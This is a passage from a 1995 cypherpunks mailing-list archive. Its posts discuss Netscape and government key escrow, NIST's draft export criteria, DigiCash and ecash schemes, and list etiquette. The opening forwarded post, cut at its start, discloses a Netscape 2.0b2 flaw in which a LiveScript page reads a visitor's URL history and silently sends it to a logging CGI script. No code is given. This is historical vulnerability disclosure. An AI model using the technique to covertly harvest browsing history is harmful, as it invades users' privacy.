  - plus any other places he happened to visit.

I do this in a way that the user will KNOW that it has happened and
will _hopefully_ email Netscape and tell them they are NOT impressed.
But it would be EASY for me to change the CGI script so that the user
is unaware that it has actually happened, unless they closely examine
their URL history (in fact they'll probably just think its a netscape
bug).


If you're skeptical about this then do the test yourself.  Get netscape
2.0b2 and do some normal surfing, and then go to Lycos.  Do a search for:

  scotts car boot sale

which should return the URL - http://www.tripleg.com.au/staff/scott

Click on the URL and sit back an watch.  First my main page will show up
but a little while later you should be transported to a CGI bin script
that will show you your URL history.

I have tested this with both the Linux 2.0b2, and Solaris 2.0b2 versions
and both have done the same thing.  I would be interested in knowing if
it happens for ALL versions of Netscape2.0b2.  The log file does log
the User Agent (i.e. the name of the platform you are using) so by simply
going to the page I will know that your version of Netscape is also
open to this form of attack.

Currently I can find no way to configure Netscape2.0b2 to NOT run
LiveScripts - and at the very least this option should be quickly
added to the next version of netscape to be released.  But a far
better solution (IMHO) would be for netscape to pop up a window before
running the LiveScript and let you know what the LiveScript wants access
to, e.g. if it only wants to print out the current time then that's
OK, but if it wants to read my history list and then transport me to
a CGI script and add me to a logfile then maybe I would say NO.

I think I've said enough....

If you've got any further questions, or want some more information just
email me : scott@tripleg.com.au

-- 
Scott.

Quote from a car accident insurance claim: "I told the police that I was
not injured, but on removing my hat, I found that I had a skull fracture."
------- End of forwarded message -------





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Scott Brickner <sjb@universe.digex.net>
Date: Sat, 2 Dec 1995 07:14:24 +0800
To: iang@cs.berkeley.edu
Subject: Re: ecash lottery (Was: ecash casino)
In-Reply-To: <49j0sq$a69@calum.csclub.uwaterloo.ca>
Message-ID: <199512012201.RAA25506@universe.digex.net>
MIME-Version: 1.0
Content-Type: text/plain


Ian Goldberg writes:
>People pay by sending:
>{
>A payment made out to "@" (the ecash wildcard)
>Their choice of lottery ticket number
>A PGP Public key
>}
>encrypted with the lottery's public key, to the remailer address.

You still have the problem that the lottery agency gets to hold the
money until after the drawing.  It's reasonable to expect that they'll
eventually take advantage of their anonymity to just skip the drawing
and abscond with the bucks.  There's some incentive for them to *not*
do this on the first few drawings, but only so they can get a good
enough reputation so when they *do* skip, they'll get a lot more
money.

The problem with this whole scheme is that there has to be some
*non-*anonymous party to enforce the contract.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mark Twain Ecash Support" <mtwain@netcom.com>
Date: Sat, 2 Dec 1995 07:57:20 +0800
To: cypherpunks@toad.com
Subject: DigiCash releases protocol specs!
Message-ID: <199512012222.OAA18230@netcom14.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


By popular request, DigiCash is releasing the protocol specs.

The specs are available at 
http://www.digicash.com/ecash/protocol.html

Please be aware that the doccument is work in progess. More 
specifications, including byte level descriptions of the message 
format will be added throughout the weekend.

--Lucky Green at

-- Mark Twain Ecash Support
   <mailto:support@marktwain.com>
   <http://www.marktwain.com/ecash.html>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Sat, 2 Dec 1995 08:40:52 +0800
To: Rich Salz <rsalz@osf.org>
Subject: Re: GAK, Netscape, CyberDog, and you.
Message-ID: <v02120d04ace52054146b@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain


At 12:45 PM 12/1/95, Rich Salz wrote:
>And my god,
>five lists this time, at least some of which have over a thousand readers?

Ouch! Actually, semper.fi has many times that many readers... ;-).

Rich, you must be the *only* person, (besides myself), who's subscribed to
*all* of those lists. I think if you check it out, that post was germaine
to every single one of the lists in question.

However, I'm sorry to bury you in a snowstorm. Getting 6 copies of the same
thing must have pissed you off, and for that, I apologise.

Cheers,
Bob Hettinga

-----------------
Robert Hettinga (rah@shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA (617) 958-3971
"Reality is not optional." --Thomas Sowell
The NEW(!) e$ Home Page: http://thumper.vmeng.com/pub/rah/
>>>>Phree Phil: Email: zldf@clark.net  http://www.netresponse.com/zldf <<<<<






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Sat, 2 Dec 1995 08:39:01 +0800
To: semper.fi@solutions.apple.com
Subject: Attribution: GAK, Netscape, CyberDog, and you.
Message-ID: <v02120d09ace5250c303d@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In the heat of the moment, I failed to attribute something to someone who
you all should know about: Tim May, one of the founders of cypherpunks, and
the person who used a greatly expanded form of this argument yesterday on
that list.

While I'm not a journalist, I did violate the rules of "News 101", and did
not attribute the source of this excellent argument. Heavy lifting, indeed.

Of course, that's nothing new. I don't believe I've ever had an original
thought in my life...

;-).

Cheers,
Bob Hettinga

P.S. Sorry, Rich, but I just had to do this one...


>Netscape's Jim Clark has quite a tightrope act going. He has a stock price
which gives Netscape a P/E ratio of something like 7,000 (the S&P average
right now is about 14), which means he really ought to get some revenue in
the door, or his investors are going to have his hide. The next thing is,
the government is a *really* big customer, and *they* want GAK, in case you
haven't noticed. ;-). Couple this with the fact that Netscape is pretty much
replicable by concentrated developer effort because its underlying
technology is an open standard, *and* the fact that any significant attempt
by them to create any real proprietary standards on the internet is
practically impossible in the long run, unless they get a whole lot of very
big customers in a hurry.
>
>Now, it looks like that's what happened already, because a lot of very
large companies have signed on to using Netscape servers, but you can also
see how really weak Netscape's position is when Uncle Sam knocks on their
door and asks for a key escrow "bug" in every "secure" Netscape web session.




-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBML92Q/gyLN8bw6ZVAQF1KQQAkqsgQJ/u9123iqLzYuduTbz6uQJtUuSQ
q5DQY/3mwGMqwoXHgWnKkx3gsT0kAZwYWIUTaKB81S7GNsgrTtqabhAy+WlemACT
7bw1TbxRL80GKXSiSfeb1BdCyUyi/yfFO6zB3m8wWB4632Bpo5RqQEd1+jCHmDgw
JHo6plE8oQ0=
=/Kd2
-----END PGP SIGNATURE-----

-----------------
Robert Hettinga (rah@shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA (617) 958-3971
"Reality is not optional." --Thomas Sowell
The NEW(!) e$ Home Page: http://thumper.vmeng.com/pub/rah/
>>>>Phree Phil: Email: zldf@clark.net  http://www.netresponse.com/zldf <<<<<






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: s1113645@tesla.cc.uottawa.ca
Date: Sat, 2 Dec 1995 06:43:44 +0800
To: cypherpunks@toad.com
Subject: Aware's radiation detector
Message-ID: <Pine.3.89.9512011612.A29760-0100000@tesla.cc.uottawa.ca>
MIME-Version: 1.0
Content-Type: text/plain


This month's Scientific American has an ad by Aware for that serial port
radiation detector we were discussing a while back. Upper right corner
of page 109, I think. Sells for $149 US, 45 day money back guaranty.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Scott Brickner <sjb@universe.digex.net>
Date: Sat, 2 Dec 1995 09:07:27 +0800
To: "James A. Donald" <jamesd@echeque.com>
Subject: Re: Barring access to Netscape
In-Reply-To: <199512010802.AAA09494@blob.best.net>
Message-ID: <199512012300.SAA26991@universe.digex.net>
MIME-Version: 1.0
Content-Type: text/plain


"James A. Donald" writes:
>At 12:32 AM 12/1/95 +0600, Ed Carp wrote:
>>If you want to bar access to your site from a Netscape browser, such 
>>can easily be accomplished.  If memory serves, every browser, when 
>>connecting to a site, exchanges certain information about the client 
>>with the server.  One can gain access easily to that information.
>
>This would not be satisfactory in itself: Ideally one would like to bring
>up a page saying  "Sorry, you cannot access that page because you
>are using a netscape browser:  Click *here* for the sad tale of
>Netscape.

Just make all the URLs on the server point to a CGI script.  The script
would check the requesting browser's id and return the real data or the
"sorry" message.  This would allow the process to be done with *no*
server changes.

Since "Cypherpunks write code", one can easily imagine a hack to the
Apache or NCSD or CERN servers that did the same thing without having
the overhead of a CGI script for each access.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brian Davis <bdavis@thepoint.net>
Date: Fri, 1 Dec 1995 08:14:48 +0800
To: sameer <sameer@c2.org>
Subject: Re: "Got a subpoena?"
In-Reply-To: <199511301946.LAA12448@infinity.c2.org>
Message-ID: <Pine.BSF.3.91.951201171205.5743A-100000@mercury.thepoint.net>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 30 Nov 1995, sameer wrote:

> > 
> > What about a court order to (a) start comprehensive logging, and (b) not
> > tell anyone under penalty of ______ .

I am unaware of any authority for such an order.
> 
> 	Aren't court orders part of the public record? I don't quite

Yes, but court orders can be sealed pending further order of the court.

> know how this would work. I don't think they can keep me from telling
> people that I've started comprehensive logging, or at least keep it
> from being founnd out. (Legally, that is. I'm sure they could always
> use an approach like threatening to audit me every year, threatening
> my family, etc.)
> 
> -- 
> sameer						Voice:   510-601-9777
> 

EBD

Not a lawyer on the Net, although I play one in real life.
**********************************************************
Flame away! I get treated worse in person every day!!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brian Davis <bdavis@thepoint.net>
Date: Sat, 2 Dec 1995 08:19:56 +0800
To: Jonathan Zamick <JonathanZ@consensus.com>
Subject: Re: Netscape gives in to key escrow
In-Reply-To: <v02120d00ace510ca1c12@[157.22.240.13]>
Message-ID: <Pine.BSF.3.91.951201171025.28141A-100000@mercury.thepoint.net>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 1 Dec 1995, Jonathan Zamick wrote:

> >I they tell you about it and you buy it anyway -- tough luck.
> >
> >
> >Same with the cars.  Would *you* buy Pinto with explosives in it????
> >(leaving aside the "inherently dangerous" argument for the moment on the
> >products liability claim).
> >
> >EBD
> 
> Hmm. The key point is that almost no general users will have a clue what
> actual security is, and what GAK is. They _might_ understand the risks of
> having an explosive in their vehicle (but can just as easily argue it wasn't

> properly designed if it went off improperly.) Regardless of what they'd know
> about their vehicle, they can easily claim to had the risks associated with
> GAK improperly represented, Netscape misleading them with deceptive claims
> of security given this potential hole etc.

And thus we return to my original point, which is that it will depend on 
what is said/disclosed.  If every copy of GAKscape had a banner, bigger 
than the Netscape "N" which said, "The government can read every message 
you send using this software no matter what you do" then I think 
consumers will be hard pressed to say they weren't warned.

> 
> I'm not saying whether or not this is the case, but we are very much in a
> legal period where individuals are in fact expected not to need common sense,
> and corporations are responsible for cleaning up after consumer stupidity.
> 
> It is certainly true that given the general state of education regarding
> crypto, the average consumer can easily say that regardless of warnings about
> GAK, that they weren't properly informed of the risk. With all the hype
> around security, Netscape and encryption people will be under the
> impression regardless
> of one little disclaimer tag, that their information is safe. Neither
> government nor corporations will disabuse them of this belief. The case
> would be strong against them as a consumer.

I disagree.  Almost nobody read the fine print on the back of a note you 
sign when you buy a car or otherwise take out a loan, but the provisions 
are generally enforceable ...  Ignorance is not necessarily an excuse.

> 
> Jonathan
> 
> ------------------------------------------------------------------------
> ..Jonathan Zamick                    Consensus Development Corporation..

EBD


Not a lawyer on the Net, although I play one in real life.
**********************************************************
Flame away! I get treated worse in person every day!!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Eric Murray <ericm@lne.com>
Date: Sat, 2 Dec 1995 09:54:40 +0800
To: tcmay@got.net (Timothy C. May)
Subject: Re: A "Warning Banner" for Netscape Navigator? Good idea!
In-Reply-To: <ace4d9270f0210047e2d@[205.199.118.202]>
Message-ID: <199512020122.RAA24017@slack.lne.com>
MIME-Version: 1.0
Content-Type: text/plain


 
Timothy C. May writes:

> One patch I'd pay money to have is one which intercept the "commercials"
> Netscape blasts out at us and replace them with something else (maybe
> nothing, maybe a "quote for the day," maybe something from a
> user-selectable file of items).
> 
> I understand that Netscape is collecting money for these "commercials," and
> that they control what is sent out. So, any such patch to intercept/remove
> these commercials would have to be done locally. Can this be done?

You can fix this from the browser.
Pull down the 'Options' menu, grab the 'Window and Link styles'
page, and change the default "home page location" from
netscape's to whatever you want.  I usually use my own home page.
I never look at Netscape's pages unless I specifically want to
see something like SSL specs.  If there wasn't a way to
turn off their home page I'd be pretty pissed off.

The descripton above is from the 1.1 browser; the 2.0x ones are
fairly similar.



-- 
Eric Murray  ericm@lne.com  ericm@motorcycle.com  http://www.lne.com/ericm
 Redistribution of this message without the author's permission is forbidden!
PGP keyid:E03F65E5 fingerprint:50 B0 A2 4C 7D 86 FC 03  92 E8 AC E6 7E 27 29 AF




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sat, 2 Dec 1995 09:23:29 +0800
To: rsalz@osf.org>
Subject: Too much crossposting! Choose your community and stop crossposting.
Message-ID: <ace4d54c0e021004966b@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


Note: I'm not subscribed to any of the lists here except the Cypherpunks
list, which I've of course been on for several years, since the start in
'92. I try to avoid cross-posting to multiple lists, and almost never to
lists I am not a subscriber to. (Cypherpunks gets enough spams from
well-meaning folks and groups who simply must have their announcements
blasted out to all the lists they think are important.)

In this case, I am leaving all of the cc: lists on this message, which is a
meta-message. (Hopefully some of the lists block messages from
non-subscribers, which will mean those readers won't see this.)

At 9:30 PM 12/1/95, Robert Hettinga wrote:
>At 12:45 PM 12/1/95, Rich Salz wrote:
>>And my god,
>>five lists this time, at least some of which have over a thousand readers?
>
>Ouch! Actually, semper.fi has many times that many readers... ;-).
>
>Rich, you must be the *only* person, (besides myself), who's subscribed to
>*all* of those lists. I think if you check it out, that post was germaine
>to every single one of the lists in question.
>
>However, I'm sorry to bury you in a snowstorm. Getting 6 copies of the same
>thing must have pissed you off, and for that, I apologise.

Bob Hettinga often has some good things to say (though his journalist-style
prose can get a bit purple at times, but that's just his style). However, a
lot of folks have good things to say at times, and clearly these good
things cannot be bounced around to all the lists which might contain
readers of these good things.

Mailing lists simply cannot survive if these kinds of cross-posts to four,
five, or even six different lists continue. Filters are nice, though I
don't relish putting Bob H. into a kill-file.

People pick the mailing lists, the communities, they wish to participate
in. This means they are electing not to read the traffic of other lists.
C'est la vie.

Even worse, massive cross-posting often produces follow-ups--such as mine
here--which are "out of synch" with the themes of the particular lists.
Thus, on the Cypherpunks list we sometimes get cross-posts which argue why
privacy is or is not a good thing. Perhaps a reasonable thing to argue, but
not on Cypherpunks. I'm sure the other lists here have had similar
experiences.

I urge everyone to practice some restraint.

--Tim May, who has a hard enough time reading the traffic on Cypherpunks
and Cyberia-l (legal issues in cyberspace) without gettting traffic on
CyberHound, WWW-BUYNOW, etc.


Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Sat, 2 Dec 1995 03:12:21 +0800
To: cypherpunks@toad.com
Subject: Media Advisory: GAK on Dec 5
Message-ID: <199512011626.RAA14939@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain



Reposted for background on the Netscape $5m IOUNSA for its 
insecure future:


Note that Messrs. Clark and Andreeson can't sell their stock 
until two years post IPO.


------------------

Nov. 6, 1995
Contact:  Anne Enright Shepherd
(301) 975-4858
anne.shepherd@nist.gov


                         MEDIA ADVISORY
          
            U.S. GOVERNMENT SEEKS PUBLIC COMMENT ON
                                
        DRAFT EXPORT CRITERIA FOR KEY ESCROW ENCRYPTION


      Revised proposed export criteria for software encryption 
products using a key  escrow mechanism are now available for 
public review. Public comment will be solicited  at a Dec. 5 
meeting to be held at the Commerce Department's National 
Institute of  Standards and Technology.


     Key escrow encryption is part of the Clinton 
Administration's initiative to promote  the use of strong 
techniques to protect the privacy of data and voice 
transmissions by  companies, government agencies and others 
without compromising the government's  ability to carry out 
lawful electronic surveillance and to execute search warrants 
for  electronically stored communications. The exportability 
criteria being proposed are for  an expedited licensing review 
process for software key escrow encryption products with  keys 
up to 64 bits long.


     The U.S. Interagency Working Group on Encryption and 
Telecommunications, a  body that develops recommendations on 
Administration encryption policies, solicits  additional public 
comment on the revised criteria.
  

     Since the Clinton Administration's Aug. 17, 1995, 
announcement of proposed  liberalization of export control 
procedures for key escrow software products with key  lengths 
up to 64 bits, the working group has met with representatives 
of computer  hardware and software manufacturers, industry 
trade associations and others interested  in providing strong 
security for electronic data and transmissions. Based on 
comments  received to date from industry, the criteria have 
been revised to better reflect  commercial interests while 
balancing the needs of law enforcement and national  security.


     These criteria do not replace or supersede any other 
licensing processes or  criteria. Export applications for other 
types of products will use the existing licensing  process.


     The Dec. 5 meeting, to be held from 9 a.m. to 5 p.m. at 
NIST in Gaithersburg,  Md., is free and open to the public. 
Representatives from the interagency encryption  working group 
will discuss the draft criteria and answer related questions. 


     Those interested in attending the workshop can register 
before Nov. 30 by  sending their name, organization, postal 
address, phone, fax number and e-mail  address to Elaine Frye 
of NIST by fax: (301) 948-1784 or e-mail: elaine.frye@nist.gov. 
 For additional information, call (301) 975-2819.


     Once public comments are received and the export criteria 
are given any  necessary clarifications, the Department of 
State is expected to issue guidance  incorporating the criteria 
in early 1996. Products will be reviewed by the State  
Department to verify that they satisfy the final criteria. 
Products meeting the criteria will  be transferred to the 
Commodity Control List administered by the Commerce  
Department's Bureau of Export Administration, where they can be 
exported under a  general license.


The revised proposed export criteria are available on the World 
Wide Web at  http://csrc.ncsl.nist.gov/keyescrow/. Reporters 
may also request a copy from Anne
Enright Shepherd at NIST, (301) 975-2762, fax: (301) 926-1630, 
or e-mail:  anne.shepherd@nist.gov.


-------------------


                        Meeting Announcement

     Draft 64-bit Software Key Escrow Encryption Export 
Criteria


On December 5, 1995, the Commerce Department's National 
Institute of Standards and  Technology (NIST) will sponsor a 
meeting to discuss proposed exportability criteria (11/95  
version) for 64-bit software key escrow encryption.  This 
meeting continues the industry-  government dialog of an 
earlier NIST-sponsored meeting held in September.  At that 
meeting,  officials of the U.S. Interagency Working Group on 
Encryption and Telecommunications  (IWG/ET) met with industry 
representatives and other interested parties to discuss an 
initial draft  of these criteria.  In response to comments 
received, the criteria have been revised with the intent  of 
achieving commercial acceptance within the flexibility 
permitted by law enforcement and  national security 
constraints.  


Changes to the proposed criteria have been made, and a new 
draft is now available for public  review and comment. 


At the upcoming meeting, representatives from the IWG/ET will 
discuss the draft criteria and  answer related questions.  Time 
will follow for industry representatives and other interested 
parties  to comment on the criteria.  Also, breakout sessions 
will be held to discuss each criterion in  greater detail.  At 
a minimum, Government representatives are scheduled to attend 
from the Office of Science and Technology Policy, National 
Security Council, the U.S. Department of State, the  U.S. 
Department of Justice, the U.S. Department of Commerce, the 
National Security Agency,  and the Federal Bureau of 
Investigation.


The meeting will be held on Tuesday, December 5, 1995 from 9:00 
a.m. to 5:00 p.m. at NIST in  Gaithersburg, Maryland in the Red 
Auditorium of the Administration Building.  Please register via 
 e-mail (to "elaine.frye@nist.gov") or via fax (301-948-1784) 
before November 30, 1995.  To  register, please provide: 1) 
your name, 2) organization, 3) postal address, 4) phone, 5) fax 
number  and 6) e-mail address.  Alternatively, walk-up 
registration will be available on-site the day of the  meeting. 
 


Directions from Washington, DC: from the Beltway (I-495) take 
I-270 North to Exit 10 (Clopper  Road).  At the first traffic 
light (Bureau Drive), turn left into the main entrance to NIST. 
 Follow  signs to the Administration Building parking lot.  The 
receptionist at the entrance to the  Administration Building 
can provide directions to the Red Auditorium.  


If you would like to make a presentation with your comments on 
the proposed criteria, you are  asked to contact Elaine Frye at 
NIST via e-mail at "elaine.frye@nist.gov" or via telephone on 
301-  975-2819 by November 30, 1995.  The number of 
presentations as well as their length may be  limited.  
Presenters (and others wishing to distribute material) are 
asked to bring 250 (attendance  estimate) copies of their 
presentations to the meeting.


-----------------


             Draft Software Key Escrow Encryption Export 
Criteria 
                                (11/95 version)


Export control jurisdiction for a software key escrow 
encryption  product that meets the following criteria, as 
determined by the  U.S. Department of State after a one-time 
review, will be  transferred to the U.S. Department of Commerce 
for export  licensing.  These criteria do not alter existing 
licensing  practices applicable to other encryption products or 
modes. Vendors must still submit other encryption to the U.S. 
Department  of State for review and export licensing, or 
jurisdiction  transfer as appropriate.  Vendors contemplating 
the development  of encryption products are encouraged to 
discuss their export  objectives with the U.S. Government.


Key Escrow Feature


1.    The key(s) required to decrypt the product's key escrow
      cryptographic functions' ciphertext shall be accessible
      through a key escrow feature.


2.    The product's key escrow cryptographic functions shall be
      inoperable until the key(s) is escrowed in accordance 
with
      #3.


3.    The product's key escrow cryptographic functions' key(s)
      shall be escrowed with escrow agent(s) certified by the 
U.S.
      Government, or certified by foreign governments with 
which
      the U.S. Government has formal agreements consistent with
      U.S. law enforcement and national security requirements.


4.    The product's key escrow cryptographic functions' 
ciphertext
      shall contain, in an accessible format and with a 
reasonable
      frequency, the identity of the key escrow agent(s) and
      information sufficient for the escrow agent(s) to 
identify
      the key(s) required to decrypt the ciphertext.


5.    The product's key escrow feature shall allow access to 
the
      key(s) needed to decrypt the product's ciphertext 
regardless
      of whether the product generated or received the 
ciphertext.


6.    The product's key escrow feature shall allow for the
      recovery of multiple decryption keys during the period of
      authorized access without requiring repeated 
presentations
      of the access authorization to the key escrow agent(s).  


Key Length Feature


7.    The product's key escrow cryptographic functions shall 
use
      an unclassified encryption algorithm with a key length 
not
      to exceed sixty-four (64) bits.


8.    The product's key escrow cryptographic functions shall 
not
      provide the feature of multiple encryption (e.g., triple-
      DES).


Interoperability Feature


9.    The product's key escrow cryptographic functions shall
      interoperate only with key escrow cryptographic functions 
in
      products that meet these criteria, and shall not
      interoperate with the cryptographic functions of a 
product
      whose key escrow encryption function has been altered,
      bypassed, disabled, or otherwise rendered inoperative.


Design, Implementation, and Operational Assurance


10.   The product shall be resistant to anything that could
      disable or circumvent the attributes described in #1 
through
      #9.


------------------


                        Background Paper

      Changes to the Criteria Based on Earlier Public Input


The government presented draft criteria (9/95 version) for the  

export of software-based key escrow encryption at an open 
meeting  at NIST on September 6-7, 1995.  Meeting participants 
suggested  several changes to the criteria; the government 
re-drafted the  criteria as described below.  Industry's ideas 
and words were  included when possible and given serious 
consideration consistent  with the protection of fundamental 
interests (e.g., privacy and  national security).


General changes to the document: The document was re-structured 
 to make it clearer.  After the introductory text, related  
criteria are grouped into the following categories:


          a.   key escrow feature

          b.   key length feature

          c.   interoperability feature

          d.   assurances


Changes to the introductory text: The wording has been 
clarified,  and additional words have been included to 
encourage vendors that  are considering building non-escrowed 
encryption products to  discuss their export objectives with 
the government.


Changes to the criteria: The criteria presented at the 
September  6-7 meeting have been modified in the following 
ways:


Old Criterion 1.    Moved to #7; wording clarified.


Old Criterion 2.    Moved to #8; wording clarified.


Old Criterion 3.    Split into #1 and #2 since the original
                    criterion had two major points in it (the
                    requirements for key escrow, and the
                    requirement on when the keys are first
                    escrowed); wording clarified.


Old Criterion 4.    Wording clarified; the notion of
                    accessibility to authorized entities was
                    modified to explicitly state that the
                    required information must be available with 
a
                    reasonable frequency.


Old Criterion 5.    Moved to #10; wording clarified, and the
                    example was deleted so that implementors 
were
                    not misled to believe that the example 
given
                    was the only way of satisfying that
                    requirement.


Old Criterion 6.    Moved to #9; wording clarified, and
                    applicability of this requirement was 
scoped
                    to address interoperability between a
                    product's key escrow mode and a non-key
                    escrow product.


Old Criterion 7.    Moved to #5; wording clarified.


Old Criterion 8.    Moved to #6; wording clarified because the
                    term "repeated involvement" was perceived 
as
                    being too broad.


Old Criterion 9.    Deleted.


Old Criterion 10.   Moved to #3; wording clarified, and
                    requirement modified to not preclude the
                    escrow of key by agents in addition to 
those
                    required by these criteria.


Note:   The September (and November) version of the criteria is
available electronically at:

"http://csrc.ncsl.nist.gov/keyescrow/"



*****************************************************  

Elaine Frye
Computer Systems Laboratory, NIST
Bldg. 225/Rm.B154
Gaithersburg, MD  20899-0001
Voice:   301/975-2819    Fax:  301/948-1784

*****************************************************









From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sat, 2 Dec 1995 09:23:19 +0800
To: cypherpunks@toad.com
Subject: A "Warning Banner" for Netscape Navigator? Good idea!
Message-ID: <ace4d9270f0210047e2d@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 10:16 PM 12/1/95, Brian Davis wrote:

>And thus we return to my original point, which is that it will depend on
>what is said/disclosed.  If every copy of GAKscape had a banner, bigger
>than the Netscape "N" which said, "The government can read every message
>you send using this software no matter what you do" then I think
>consumers will be hard pressed to say they weren't warned.

I agree with this.

In fact, I think it's an excellent argument for providing this in Netscape.
Seriously. A version of Netscape with such warning banners (exact wording
to be determined, but probably mentioning limited key lengths, GAK, etc.)
would be a Good Thing.

And if Netscape Communications will not release their products in such a
way, some alternatives may exist. Maybe:

1. A patch that adds this, analogous to the patches that alter the Netscape
logo.

2. An entirely patched new version.

Good idea, Brian!

One patch I'd pay money to have is one which intercept the "commercials"
Netscape blasts out at us and replace them with something else (maybe
nothing, maybe a "quote for the day," maybe something from a
user-selectable file of items).

I understand that Netscape is collecting money for these "commercials," and
that they control what is sent out. So, any such patch to intercept/remove
these commercials would have to be done locally. Can this be done?

--Tim May

Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Laszlo Vecsey <master@internexus.net>
Date: Sat, 2 Dec 1995 08:07:50 +0800
To: Simon Spero <ses@tipper.oit.unc.edu>
Subject: Barring access to Netscape, a step better
In-Reply-To: <Pine.SOL.3.91.951201002746.2186B-100000@chivalry>
Message-ID: <Pine.LNX.3.91.951201173320.21765D-100000@micro.internexus.net>
MIME-Version: 1.0
Content-Type: text/plain


> The field is User-Agent. However, blocking access to users of Navigator 
> isn't a particularly useful thing to do. If you must do something, why 
> not modify your GET handler to add a header to the start of all html 
> pages informing people of the problem, and suggesting alternatives. 

Great idea! I'm sure there is a cyberpunk on this list willing to write a 
patch to NCSA HTTPd to get the job done, in a configurable manor of 
course so that a template.html would be 'inserted' at the top of every 
document sent out to the specified browser. Any takers?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@lighthouse.homeport.org>
Date: Sat, 2 Dec 1995 08:48:01 +0800
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: (fwd) Re: SKIP domestic Source release is available
Message-ID: <199512012250.RAA20268@homeport.org>
MIME-Version: 1.0
Content-Type: text


	A while ago, someone was asking after Sun Microsystems-Russian
crypto connections.  This tidbit was in sci.crypt, in a message with
Message-ID: <DIwxqo.7zu@ipmce.su>.  www.elvis.ru/english/portrait.html
has some on the Sun-Elvis connection.

Adam

>AFAIK, an international version of SKIP was developed in Russia, in
>Sun parthner Elvis+. Check www.elvis.ru. I beleive one may this
>implementation of SKIP outside of U.S., for example in Russia.


-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Syed Yusuf <yusuf921@uidaho.edu>
Date: Sat, 2 Dec 1995 10:35:40 +0800
To: "Beavis B. Thoopit" <beavis@bioanalytical.com>
Subject: Re: available news/mail filtering
In-Reply-To: <199512012001.PAA01825@bioanalytical.com>
Message-ID: <Pine.HPP.3.91.951201175410.1752A-100000@harrier.csrv.uidaho.edu>
MIME-Version: 1.0
Content-Type: text/plain



On Fri, 1 Dec 1995, Beavis B. Thoopit wrote:

> What news and mail filter programs are available?  Pointers
> will be appreciated.

I use procmail in a .procmailrc through my .forward 

--
Syed Yusuf <yusuf921@uidaho.edu> |   http://www.uidaho.edu/~yusuf921 
Keep me away from Wisdom that does not Cry, Philosophy that does not Laugh, 
and Greatness that does not bow before Children
                                                 --Kalil Gibran





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: 103155.2774@compuserve.com
Date: Sun, 3 Dec 1995 11:16:40 +0800
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <199512012300.SAA25794@arl-mail-svc-1.compuserve.com>
MIME-Version: 1.0
Content-Type: text/plain



Hello...i'm new to this, but love it...Tell me how exciting this is!!!!!/// 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: futplex@pseudonym.com (Futplex)
Date: Sat, 2 Dec 1995 09:04:44 +0800
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: nsa and netscape
In-Reply-To: <199512011553.JAA12735@spirit.sctc.com>
Message-ID: <199512012304.SAA22488@opine.cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


Bob Bruen writes:
# At yesterdays FNC  (Federal Networking Council) meeting it was 
# mentioned in passing that NSA has given Netscape a grant of $5 Million 
# (yes $5M) to beef up the security features of Netscape. More info will 
# be forthcoming on this.

david d `zoo' zuhn writes:
> FORTEZZA support is virtually required for any sort of new network
> authentication within the US DoD.  
> 
> The DoD pie is rather large, and I don't blame Netscape for trying to get
> a piece of it.  One can support FORTEZZA without giving in to GAK for
> non-FORTEZZA users.

For the moment I am inclined to agree that there's nothing terribly sinister
about this. I've just been flipping through
<a href="http://www.fnc.gov/fisp_sec_contents.html">the FNC's draft Federal 
Internet Security Plan (FISP)</a>. In particular it mentions:

------------
4.2 Internet Security Technology Development



     The IETF and other activities are currently expanding their efforts to
     develop and deploy technology standards to meet the growing security 
